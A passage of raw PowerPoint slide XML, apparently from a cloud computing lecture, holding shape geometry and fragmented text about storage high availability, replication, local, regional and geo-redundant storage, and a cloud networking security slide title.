                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3321" y="866548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12287" y="878935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25396" y="887083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="890015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57596" y="887083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70627" y="878935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79206" y="866548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82296" y="850900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79206" y="835894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70627" y="823436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57596" y="814931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="811784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0215371" y="5285231"/>
              <a:ext cx="4079875" cy="3017520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4079875" h="3017520">
                  <a:moveTo>
                    <a:pt x="0" y="502919"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2302" y="454486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9068" y="407355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20088" y="361737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35150" y="317842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54044" y="275883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76558" y="236069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102483" y="198611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131608" y="163720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163720" y="131608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198611" y="102483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236069" y="76558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275883" y="54044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317842" y="35150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361737" y="20088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407355" y="9068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454486" y="2302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502920" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3576828" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3625261" y="2302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3672392" y="9068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3718010" y="20088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3761905" y="35150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3803864" y="54044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3843678" y="76558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3881136" y="102483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3916027" y="131608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948139" y="163720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3977264" y="198611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4003189" y="236069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4025703" y="275883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4044597" y="317842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4059659" y="361737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4070679" y="407355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4077445" y="454486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4079747" y="502919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4079747" y="2514599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4077445" y="2563033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4070679" y="2610164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4059659" y="2655782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4044597" y="2699677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4025703" y="2741636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4003189" y="2781450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3977264" y="2818908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948139" y="2853799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3916027" y="2885911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3881136" y="2915036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3843678" y="2940961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3803864" y="2963475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3761905" y="2982369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3718010" y="2997431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3672392" y="3008451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3625261" y="3015217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3576828" y="3017519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502920" y="3017519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454486" y="3015217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407355" y="3008451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361737" y="2997431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317842" y="2982369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275883" y="2963475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236069" y="2940961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198611" y="2915036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163720" y="2885911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131608" y="2853799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102483" y="2818908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76558" y="2781450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54044" y="2741636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35150" y="2699677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20088" y="2655782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9068" y="2610164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2302" y="2563033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2514599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="502919"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="12700">
              <a:solidFill>
                <a:srgbClr val="E3B36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2085594" y="1780793"/>
            <a:ext cx="1248219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High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Availability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(HA)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refers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storage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provisioned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with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guarantee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99.99%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uptime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better.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697226" y="5744333"/>
            <a:ext cx="2655570" cy="2089785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2000" spc="105" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>High</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-135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000" spc="70" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>availability</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="113999"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-7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000" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rt</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-35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dirty="0" sz="2000" spc="-85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ali</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>z</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>atio</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-35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000" spc="-15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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>layer  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-2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000" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ovis</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>io</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-55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000" spc="-6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000" spc="-14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000" spc="-40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r>
              <a:rPr dirty="0" sz="2000" spc="-25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000" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>amic  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>allocatio</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5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000" spc="-14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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>and  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>redundancy</a:t>
            </a:r>
            <a:endParaRPr sz="20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340"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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-130">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>99</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-165">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-130">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5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dirty="0" sz="2000" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>pt</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-4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000" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>me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904990" y="5923657"/>
            <a:ext cx="2497455" cy="1742439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2000" spc="65" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Replication</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="238760" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="113999"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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-60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Co</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>yi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-7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000" spc="-15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dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>data  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>betwe</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="200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000" spc="-15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000" spc="-14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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>med</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-2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000" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>a,  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-3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000" spc="-2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000" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rv</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-1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000" spc="-85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rs</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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000" spc="-15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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>sites</a:t>
            </a:r>
            <a:endParaRPr sz="20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335"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="6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000" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rformanc</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-2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0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7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000" spc="-6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000" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ers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990580" y="5704433"/>
            <a:ext cx="2961640" cy="7207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3999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="105" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>High</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-130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000" spc="70" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>availability</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-110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000" spc="95" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>across </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-590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000" spc="60" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>zones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990580" y="6425307"/>
            <a:ext cx="2242820" cy="1390015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229"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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-40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Local</a:t>
            </a:r>
            <a:endParaRPr sz="20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335"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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-45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Regional</a:t>
            </a:r>
            <a:endParaRPr sz="20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335"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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-55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Geo-Redundant</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Stora</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-16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dirty="0" sz="2000" spc="1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0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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>GR</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="200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000" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="2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40400" y="306451"/>
            <a:ext cx="477456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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cloud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150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Networking</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security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15103" y="1988565"/>
            <a:ext cx="785939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Contexts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terms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customer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configured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cloud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networking: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90515" y="760476"/>
            <a:ext cx="6516624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740407" y="6192011"/>
            <a:ext cx="4048125" cy="1923414"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4048125" h="1923415">
                <a:moveTo>
                  <a:pt x="0" y="320548"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3475" y="273178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13571" y="227967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29791" y="185411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51641" y="146004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78623" y="110243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110243" y="78623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146004" y="51641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185411" y="29791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227967" y="13571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="273178" y="3475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="320548" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3727196" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3774565" y="3475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3819776" y="13571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3862332" y="29791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3901739" y="51641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3937500" y="78623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3969120" y="110243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3996102" y="146004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4017952" y="185411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4034172" y="227967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4044268" y="273178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4047744" y="320548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4047744" y="1602740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4044268" y="1650106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4034172" y="1695315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4017952" y="1737871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3996102" y="1777277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3969120" y="1813039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3937500" y="1844660"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3901739" y="1871643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3862332" y="1893494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3819776" y="1909715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3774565" y="1919812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3727196" y="1923288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="320548" y="1923288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="273178" y="1919812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227967" y="1909715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185411" y="1893494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146004" y="1871643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110243" y="1844660"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78623" y="1813039"/>
                </a:lnTo>
